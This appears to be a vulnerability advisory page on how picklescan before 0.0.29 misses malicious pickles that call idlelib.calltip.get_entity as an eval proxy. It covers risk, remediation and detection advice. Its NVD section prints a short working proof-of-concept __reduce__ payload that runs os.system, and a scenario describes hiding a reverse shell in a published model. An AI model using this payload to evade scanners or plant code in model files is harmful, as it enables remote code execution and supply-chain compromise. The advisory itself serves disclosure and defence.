GHSA-9xph-j2h6-g47v — MEDIUM AI Security Vulnerability

Q: What is GHSA-9xph-j2h6-g47v?

picklescan < 0.0.29 fails to detect malicious pickle files that use Python's built-in idlelib.calltip.get_entity as an eval proxy, producing a false-negative scan result. Any pipeline that gates model loading on a picklescan pass is vulnerable to RCE from a file that clears the scan. Upgrade to picklescan 0.0.29 immediately and enforce defense-in-depth—never treat a single scanner pass as sufficient for untrusted model files.

Q: Is GHSA-9xph-j2h6-g47v actively exploited?

No confirmed active exploitation of GHSA-9xph-j2h6-g47v has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-9xph-j2h6-g47v?

1. Upgrade picklescan to 0.0.29 immediately across all environments. 2. Audit existing model intake workflows: any system that autoloads pickled models after a picklescan pass without additional controls should be treated as potentially compromised if exposed to external model sources. 3. Enforce defense-in-depth: migrate to SafeTensors format for model storage where possible (eliminates pickle deserialization entirely); use torch.load with weights_only=True for PyTorch models; sandbox model loading in isolated containers with no network access. 4. Detection: scan pickle files for references to idlelib.calltip or other non-standard built-in namespaces in __reduce__ methods; alert on unexpected subprocess, os.system, or eval calls originating from ML serving processes at runtime.

Q: What systems are affected by GHSA-9xph-j2h6-g47v?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, MLOps pipelines, model registries.

Q: What is the CVSS score for GHSA-9xph-j2h6-g47v?

No CVSS score has been assigned yet.

CISO Take

picklescan < 0.0.29 fails to detect malicious pickle files that use Python's built-in idlelib.calltip.get_entity as an eval proxy, producing a false-negative scan result. Any pipeline that gates model loading on a picklescan pass is vulnerable to RCE from a file that clears the scan. Upgrade to picklescan 0.0.29 immediately and enforce defense-in-depth—never treat a single scanner pass as sufficient for untrusted model files.

Risk Assessment

High operational risk despite the 'medium' severity label. Exploitability is trivial post-disclosure (5-line PoC), and impact is full RCE on the host that loads the file. The false-negative nature of the vulnerability is especially dangerous: defenders have a false confidence that scanned files are safe. Blast radius covers any MLOps workflow using picklescan as a security gate for pickle-format model files—a pattern widespread across ML engineering teams.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
picklescan	pip	< 0.0.29	`0.0.29`
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Recommended Action

4 steps

Upgrade picklescan to 0.0.29 immediately across all environments.
Audit existing model intake workflows: any system that autoloads pickled models after a picklescan pass without additional controls should be treated as potentially compromised if exposed to external model sources.
Enforce defense-in-depth: migrate to SafeTensors format for model storage where possible (eliminates pickle deserialization entirely); use torch.load with weights_only=True for PyTorch models; sandbox model loading in isolated containers with no network access.
Detection: scan pickle files for references to idlelib.calltip or other non-standard built-in namespaces in __reduce__ methods; alert on unexpected subprocess, os.system, or eval calls originating from ML serving processes at runtime.

Classification

Supply Chain Code Execution Model Framework AML.T0010.001 - AI Software AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0058 - Publish Poisoned Models AML.T0074 - Masquerading AML.T0107 - Exploitation for Defense Evasion

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.1.2 - AI system risk assessment A.7.3 - Supplier and third-party relationships

NIST AI RMF

MANAGE 2.4 - Residual risks are managed and controlled

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-9xph-j2h6-g47v?

picklescan < 0.0.29 fails to detect malicious pickle files that use Python's built-in idlelib.calltip.get_entity as an eval proxy, producing a false-negative scan result. Any pipeline that gates model loading on a picklescan pass is vulnerable to RCE from a file that clears the scan. Upgrade to picklescan 0.0.29 immediately and enforce defense-in-depth—never treat a single scanner pass as sufficient for untrusted model files.

Is GHSA-9xph-j2h6-g47v actively exploited?

No confirmed active exploitation of GHSA-9xph-j2h6-g47v has been reported, but organizations should still patch proactively.

How to fix GHSA-9xph-j2h6-g47v?

1. Upgrade picklescan to 0.0.29 immediately across all environments. 2. Audit existing model intake workflows: any system that autoloads pickled models after a picklescan pass without additional controls should be treated as potentially compromised if exposed to external model sources. 3. Enforce defense-in-depth: migrate to SafeTensors format for model storage where possible (eliminates pickle deserialization entirely); use torch.load with weights_only=True for PyTorch models; sandbox model loading in isolated containers with no network access. 4. Detection: scan pickle files for references to idlelib.calltip or other non-standard built-in namespaces in __reduce__ methods; alert on unexpected subprocess, os.system, or eval calls originating from ML serving processes at runtime.

What systems are affected by GHSA-9xph-j2h6-g47v?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, MLOps pipelines, model registries.

What is the CVSS score for GHSA-9xph-j2h6-g47v?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Using idlelib.calltip.get_entity function, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.calltip.get_entity function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` from idlelib.calltip import get_entity class EvilCalltipGetEntity: def __reduce__(self): # get_entity(expression) -> eval(expression) return get_entity, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Corresponding https://github.com/FredericDT https://github.com/Qhaoduoyu

Exploitation Scenario

An attacker publishes a fine-tuned language or vision model to Hugging Face or a corporate model registry. The model file contains a __reduce__ method that calls idlelib.calltip.get_entity with an embedded reverse shell command—idlelib.calltip internally calls eval(), executing the payload. The victim organization's automated MLOps pipeline downloads the model, runs picklescan (file passes with no warnings), and loads it into the inference environment. The shell executes with the privileges of the ML serving process, yielding access to GPU nodes, production model weights, and internal network segments. The entire compromise chain is invisible to teams relying solely on picklescan.